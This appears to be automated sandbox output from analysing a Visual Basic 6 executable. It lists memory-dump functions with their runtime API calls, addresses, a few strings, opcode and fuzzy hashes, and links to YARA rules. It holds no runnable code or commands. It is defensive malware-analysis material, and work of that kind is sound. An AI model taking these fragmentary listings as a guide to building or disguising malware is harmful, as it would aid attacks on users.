Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Get3$Copy$#516#631Bstr$#525#648ErrorFileOpen$#537BoundsGenerateList
String ID:
API String ID: 695521769-0
Opcode ID: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
Instruction ID: 7f18cb6a5bab86a65f3f7d37ad3edf1072490e8e3ae84fdb7564aa9c634781f6
Opcode Fuzzy Hash: f8ef0d2bbbc17cc47077afd85e451489e7cc431014dfc9b52aac7517ad6bcadf
Instruction Fuzzy Hash: ADA1C071E00258DBCB14EFE5ED84ADEBBB5FF48300F50412AE516AB2A1DB745885CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00422BF0, Relevance: 61.7, APIs: 41, Instructions: 214COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,00000000,004032B6), ref: 00422C0E
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004032B6), ref: 00422C3B
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004032B6), ref: 00422C4A
#648.MSVBVM60(0000000A), ref: 00422C69
__vbaFreeVar.MSVBVM60 ref: 00422C78
__vbaI2I4.MSVBVM60(?), ref: 00422C8C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00422C9A
__vbaI2I4.MSVBVM60 ref: 00422CAA
#570.MSVBVM60(00000000), ref: 00422CB1
__vbaLenBstr.MSVBVM60(0040545C), ref: 00422CBE
__vbaI2I4.MSVBVM60 ref: 00422CF3
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422CFE
__vbaI2I4.MSVBVM60 ref: 00422D0E
__vbaGet3.MSVBVM60(00000004,?,00000000), ref: 00422D1B
__vbaLenBstr.MSVBVM60(0040545C), ref: 00422D39
__vbaLenBstr.MSVBVM60(0040545C), ref: 00422D67
#525.MSVBVM60(00000000), ref: 00422D6E
__vbaStrMove.MSVBVM60 ref: 00422D79
__vbaI2I4.MSVBVM60 ref: 00422D89
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00422D94
__vbaI2I4.MSVBVM60 ref: 00422DA4
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422DB1

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrMove.MSVBVM60(?), ref: 00422DCC
__vbaStrCopy.MSVBVM60 ref: 00422DEA
__vbaStrMove.MSVBVM60(00000003), ref: 00422DFB
#616.MSVBVM60(00000000), ref: 00422E02
__vbaStrMove.MSVBVM60 ref: 00422E0D

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrMove.MSVBVM60(?,00000000), ref: 00422E22
__vbaStrCmp.MSVBVM60(00000000), ref: 00422E29
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00422E50

Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE

__vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00422E76
__vbaStrMove.MSVBVM60(00000004), ref: 00422E97
#618.MSVBVM60(00000000), ref: 00422E9E
__vbaStrMove.MSVBVM60 ref: 00422EA9
__vbaI4Str.MSVBVM60(00000000), ref: 00422EB0
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00422EC7
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422EDA
__vbaFileClose.MSVBVM60(00000000), ref: 00422EE1
__vbaFreeStr.MSVBVM60(00422F2A), ref: 00422F1A
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00422F23
__vbaErrorOverflow.MSVBVM60 ref: 00422F40

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
String ID:
API String ID: 277344030-0
Opcode ID: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
Instruction ID: 0dbf9007f3e025cc507390632291acf7cd708b816fac69f1e160cd6eff4667e3
Opcode Fuzzy Hash: 80d27adf0f7515f30dffb66509e59b70ef8c6a723e0b90cbf6394fe901ba1ca0
Instruction Fuzzy Hash: 8091C871D00248EFDB04DFA0DA48BDEBBB8FB48705F108169E612B76A0DB745A49CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0040D650, Relevance: 61.5, APIs: 31, Strings: 4, Instructions: 283COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001), ref: 0040D69B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D6B2
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,0000004C), ref: 0040D6D3
__vbaFreeObj.MSVBVM60 ref: 0040D6FA
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D724
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004082BC,00000040), ref: 0040D749
__vbaLateIdCallLd.MSVBVM60(?,?,68030000,00000000), ref: 0040D75E
__vbaI4Var.MSVBVM60(00000000), ref: 0040D768
__vbaLateMemCallLd.MSVBVM60(?,?,hwnd,00000000,00008003), ref: 0040D78A
__vbaVarTstEq.MSVBVM60(00000000), ref: 0040D794
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040D7A2
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040D7B2
__vbaExitProc.MSVBVM60 ref: 0040D7DF
__vbaExitProc.MSVBVM60 ref: 0040D7EC

Strings

Once, xrefs: 0040D90C, 0040D972
hwnd, xrefs: 0040D77E
MR, xrefs: 0040DA2E
RO, xrefs: 0040D8E8, 0040D94D

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CallCheckExitHresultLateListProc$Error
String ID: MR$ RO$Once$hwnd
API String ID: 1721777011-1584818490
Opcode ID: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
Instruction ID: 3a18aed98be3068f103a5839567168951ce735157339c65100099b40d738d62c
Opcode Fuzzy Hash: f1c211779c0b3bb3b88594b85937cb88ccef8d8afbaf8a30aea8c47be55a5225
Instruction Fuzzy Hash: 24B10771900204EBDB04DFE4DD49BAEBBB8FF48700F50816AE505B72A1DB785945CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2C0, Relevance: 57.9, APIs: 31, Strings: 2, Instructions: 171COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0041F2DE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F30E
#717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F33D
__vbaStrVarMove.MSVBVM60(?), ref: 0041F347
__vbaStrMove.MSVBVM60 ref: 0041F352
__vbaFreeVar.MSVBVM60 ref: 0041F35B
__vbaStrCopy.MSVBVM60 ref: 0041F38A
#717.MSVBVM60(?,00004008,00000040,00000000), ref: 0041F3B9
__vbaStrVarMove.MSVBVM60(?), ref: 0041F3C3
__vbaStrMove.MSVBVM60 ref: 0041F3CE
__vbaStrCopy.MSVBVM60 ref: 0041F3D9
__vbaFreeStr.MSVBVM60 ref: 0041F3E2
__vbaFreeVar.MSVBVM60 ref: 0041F3EB
__vbaStrCat.MSVBVM60(00000000,Remark for ), ref: 0041F411
#717.MSVBVM60(?,00000008,00000040,00000000), ref: 0041F430
__vbaStrVarMove.MSVBVM60(?), ref: 0041F43D
__vbaStrMove.MSVBVM60 ref: 0041F448
__vbaStrCopy.MSVBVM60 ref: 0041F453
__vbaFreeStr.MSVBVM60 ref: 0041F45C
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0041F46F
__vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 0041F4CF
__vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 0041F4DD
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0041F4EB
__vbaFreeStr.MSVBVM60 ref: 0041F4F4
__vbaRecUniToAnsi.MSVBVM60(00406F68,?,?,?), ref: 0041F515
__vbaSetSystemError.MSVBVM60(00000000,00000002,00000000), ref: 0041F525
__vbaRecAnsiToUni.MSVBVM60(00406F68,?,?), ref: 0041F53B
__vbaRecDestructAnsi.MSVBVM60(00406F68,?), ref: 0041F54D
__vbaRecDestructAnsi.MSVBVM60(00406F68,?,0041F5A5), ref: 0041F586
__vbaFreeStr.MSVBVM60 ref: 0041F58F
__vbaRecDestruct.MSVBVM60(00406F68,?), ref: 0041F59E

Strings

P, xrefs: 0041F48D
Remark for , xrefs: 0041F406

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Ansi$#717CopyDestructError$System$ChkstkListUnicode
String ID: P$Remark for
API String ID: 3958374764-404550290
Opcode ID: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
Instruction ID: 57f6e2307a2881c8932ec88b1fdace90c080974f77e0174b8cc4dbb87e3633e4
Opcode Fuzzy Hash: 3836bbc5565a20a4707f8b3767ffc18a2dee7e207138df64e28d7e6c74dad988
Instruction Fuzzy Hash: 2081FAB1900249EFDB14DFA0DE49BDEBBB8FB48305F108169E506BB2A0DB745A49CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411210, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 255COMMON

Download Yara Rule

APIs

#594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0041127A
__vbaFreeVar.MSVBVM60 ref: 00411283
__vbaLenBstr.MSVBVM60 ref: 0041128F
#631.MSVBVM60(?,?,0000000A), ref: 004112C8
__vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
#516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
__vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
__vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
#593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 004113D6
#714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 00411464
__vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0041147C
__vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 00411483
__vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 004114A0
#537.MSVBVM60(?,?), ref: 004114B4
__vbaStrMove.MSVBVM60(?,?), ref: 004114C5
__vbaStrCat.MSVBVM60(00000000,?,?), ref: 004114C8
__vbaStrMove.MSVBVM60(?,?), ref: 004114D3
#537.MSVBVM60(?,00000000,?,?), ref: 004114D7
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114E2
__vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 004114EB
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 004114F2
#537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 004114F6
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 00411501
__vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 00411504
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0041150B
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 00411523
__vbaStrCopy.MSVBVM60 ref: 0041154C
__vbaFreeStr.MSVBVM60(004115AE), ref: 004115A7
__vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 004115C9

Strings

gfff, xrefs: 0041137D
gfff, xrefs: 004113DF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
String ID: gfff$gfff
API String ID: 2397813863-3084402119
Opcode ID: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
Instruction ID: 89f21965ee05a7b64c3006bf8dd978c4399402eb5f0bddd0a045db34c415a49c
Opcode Fuzzy Hash: 62ef2a4d85f8eb3fe8f937d03407a8f9ec95a64fd7d0ffd1317382de30af7ef6
Instruction Fuzzy Hash: 9B9162B1E00249AFCB08DFA4DD45BDDBBFAEB88301F10412AE50AE7264EB345985CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5A0, Relevance: 52.7, APIs: 35, Instructions: 220COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,0040C87B,00000000), ref: 0041A5BE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041A5EE
__vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,00000000,Function_000032B6), ref: 0041A5FF
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A60E
__vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A62A
__vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0041A664
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041A67A
__vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0041A693
#525.MSVBVM60(00000104), ref: 0041A6BC
__vbaStrMove.MSVBVM60 ref: 0041A6C7
__vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0041A6FE
__vbaGenerateBoundsError.MSVBVM60 ref: 0041A73D
__vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0041A758
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041A77E
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041A78F
__vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7A4
#616.MSVBVM60(?,?,?,00000000), ref: 0041A7B9
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041A7C7
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 0041A7DE
__vbaFreeStr.MSVBVM60(?,00000000), ref: 0041A7EA
__vbaLenBstr.MSVBVM60(?,?,00000000), ref: 0041A7FB
__vbaStrCat.MSVBVM60(?,00407CCC,?,00000001,?,00000000), ref: 0041A822
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041A830
__vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000000), ref: 0041A83C
__vbaStrMove.MSVBVM60(?,00000000), ref: 0041A84A
__vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 0041A853
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 0041A879
__vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128,?,00000000), ref: 0041A8BA
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 0041A8D0
__vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?,?,00000000), ref: 0041A8E9
__vbaSetSystemError.MSVBVM60(?), ref: 0041A90D
__vbaFreeStr.MSVBVM60(0041A96B), ref: 0041A937
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041A94F
__vbaFreeStr.MSVBVM60 ref: 0041A958
__vbaFreeStr.MSVBVM60 ref: 0041A964

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$FreeSystem$AnsiMove$#525#616BoundsBstrChkstkConstruct2CopyDestructGenerateListUnicode
String ID:
API String ID: 1820427907-0
Opcode ID: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
Instruction ID: da6c7bdc064fde5d6e21051214ad5d77861f7fd9d568965cd9a71694eebb6c89
Opcode Fuzzy Hash: 966c6123da24b71d08ec0f7a5c1a4cfb51299011817f3b4dc7b4b5ec285d64dd
Instruction Fuzzy Hash: B5A11975901259DBDB14EFA0DE4DBDEB7B4FB48304F1081A9E10AB72A0DB745A84CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004193C0, Relevance: 51.3, APIs: 34, Instructions: 299COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 004193DE
__vbaOnError.MSVBVM60(000000FF,00000000,?,?,00000000,Function_000032B6), ref: 0041940E
__vbaSetSystemError.MSVBVM60(?,?), ref: 00419428
__vbaRedim.MSVBVM60(00000000,0000004C,?,00000000,00000001,?,00000000), ref: 00419458
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 0041947D
__vbaAryLock.MSVBVM60(?,?), ref: 00419495
__vbaGenerateBoundsError.MSVBVM60 ref: 004194C9
__vbaGenerateBoundsError.MSVBVM60 ref: 004194DA
__vbaSetSystemError.MSVBVM60(?,?,?), ref: 004194FA
__vbaAryUnlock.MSVBVM60(00000000), ref: 00419504
__vbaAryLock.MSVBVM60(?,?), ref: 00419519
__vbaGenerateBoundsError.MSVBVM60 ref: 0041954D
__vbaGenerateBoundsError.MSVBVM60 ref: 0041955E
__vbaAryLock.MSVBVM60(00000000,?), ref: 0041956F
__vbaGenerateBoundsError.MSVBVM60 ref: 004195A3
__vbaGenerateBoundsError.MSVBVM60 ref: 004195B7
__vbaSetSystemError.MSVBVM60(?,?,?), ref: 004195E6
__vbaAryUnlock.MSVBVM60(00000000), ref: 004195F0
__vbaAryUnlock.MSVBVM60(00000000), ref: 004195FA
__vbaAryLock.MSVBVM60(00000000,?), ref: 00419650
__vbaAryDestruct.MSVBVM60(00000000,?,00419803), ref: 004197F0
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004197FC

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$Lock$SystemUnlock$DestructRedim$Chkstk
String ID:
API String ID: 3555954879-0
Opcode ID: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
Instruction ID: 67aec0367089ad9bdb06f85a3682bb1edb9e8b84c894a553a99a1ed1c2ada365
Opcode Fuzzy Hash: d7053a601a00c9baf09ed0f933eca4d89ef72334d0a3dcf76765fe079d3190a2
Instruction Fuzzy Hash: BED1E470D00208EFDB18DFA4DA98BDDBBB5BF48300F10815AE516B72A1DB74A985CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00420F80, Relevance: 49.7, APIs: 33, Instructions: 230COMMON

Download Yara Rule

APIs

__vbaGenerateBoundsError.MSVBVM60(00000000,00001000,72A1C410,72A21A08), ref: 00420FA3
__vbaGenerateBoundsError.MSVBVM60(00000000,00001000,72A1C410,72A21A08), ref: 00420FC5
__vbaI2I4.MSVBVM60(00000000,00001000,72A1C410,72A21A08), ref: 00420FD2
__vbaGenerateBoundsError.MSVBVM60 ref: 00420FE6
__vbaI2I4.MSVBVM60 ref: 00420FED
__vbaGenerateBoundsError.MSVBVM60 ref: 00421029
__vbaGenerateBoundsError.MSVBVM60 ref: 00421044
__vbaGenerateBoundsError.MSVBVM60 ref: 00421056
__vbaGenerateBoundsError.MSVBVM60 ref: 00421071
__vbaGenerateBoundsError.MSVBVM60 ref: 004210A0
__vbaGenerateBoundsError.MSVBVM60 ref: 004210C6
__vbaGenerateBoundsError.MSVBVM60 ref: 0042113B
__vbaGenerateBoundsError.MSVBVM60 ref: 00421149
__vbaGenerateBoundsError.MSVBVM60 ref: 00421160
__vbaGenerateBoundsError.MSVBVM60 ref: 0042116A
__vbaGenerateBoundsError.MSVBVM60 ref: 00421181
__vbaGenerateBoundsError.MSVBVM60 ref: 0042118B
__vbaGenerateBoundsError.MSVBVM60 ref: 004211A2
__vbaGenerateBoundsError.MSVBVM60 ref: 004211B5
__vbaGenerateBoundsError.MSVBVM60 ref: 004211CE
__vbaGenerateBoundsError.MSVBVM60 ref: 004211E2
__vbaGenerateBoundsError.MSVBVM60 ref: 004211F5
__vbaGenerateBoundsError.MSVBVM60 ref: 00421209
__vbaGenerateBoundsError.MSVBVM60 ref: 00421223
__vbaGenerateBoundsError.MSVBVM60 ref: 00421237
__vbaGenerateBoundsError.MSVBVM60 ref: 00421250
__vbaGenerateBoundsError.MSVBVM60 ref: 00421269
__vbaGenerateBoundsError.MSVBVM60 ref: 00421281
__vbaGenerateBoundsError.MSVBVM60 ref: 0042129F
__vbaGenerateBoundsError.MSVBVM60 ref: 004212B2
__vbaGenerateBoundsError.MSVBVM60 ref: 004212C6
__vbaI2I4.MSVBVM60 ref: 004212CD
__vbaErrorOverflow.MSVBVM60(00000000,00001000,72A1C410,72A21A08), ref: 004212E7

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Error$BoundsGenerate$Overflow
String ID:
API String ID: 2760075901-0
Opcode ID: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
Instruction ID: 6f7972a480d0dd1fda114303b5166632bd8b31c6f1599b60b9e65e0100795082
Opcode Fuzzy Hash: 7623d4b20da7c6b818f332ecc799d3caca9fe6e1c56e874aff0741b4b89b7b8a
Instruction Fuzzy Hash: 0F81D835B00361C6C724AB98E9C65ADB3A3BFA9701FC10076D580A7271CF7998C1C7AE

Uniqueness

Uniqueness Score: -1.00%

Function 00420C20, Relevance: 49.7, APIs: 33, Instructions: 191COMMON

Download Yara Rule

APIs

__vbaGenerateBoundsError.MSVBVM60(72A26C30), ref: 00420C36
__vbaGenerateBoundsError.MSVBVM60(72A26C30), ref: 00420C51
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420C6B
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420C84
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420C9B
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420CB9
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420CD3
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420CEF
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D0A
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D24
__vbaGenerateBoundsError.MSVBVM60 ref: 00420D2E
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D42
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D60
__vbaGenerateBoundsError.MSVBVM60 ref: 00420D6A
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D7E
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D95
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420D9F
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420DB6
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420DC9
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420DE6
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420DF0
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E07
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E1B
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E32
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E3F
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E56
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E6A
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E85
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420E99
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420EAE
__vbaGenerateBoundsError.MSVBVM60(00000000,72A256DE,72A26C30), ref: 00420EC2
__vbaGenerateBoundsError.MSVBVM60(72A26C30), ref: 00420ED8
__vbaI2I4.MSVBVM60(72A26C30), ref: 00420EDF

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$BoundsErrorGenerate
String ID:
API String ID: 3574812510-0
Opcode ID: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
Instruction ID: aa417d5a5a3cc9c21652b4fe2a9d25cfa30c058b0be9d244c1a14ba1329cb19f
Opcode Fuzzy Hash: 531f9eca504aa198c6c6dfefc7d7df16526d6ddf688e9b54a0de9df055713b13
Instruction Fuzzy Hash: 9E718935F1136586D724AB99E9C75ADB3E3BF88701FC11466C48123262DFB8A8C1C6DD

Uniqueness

Uniqueness Score: -1.00%

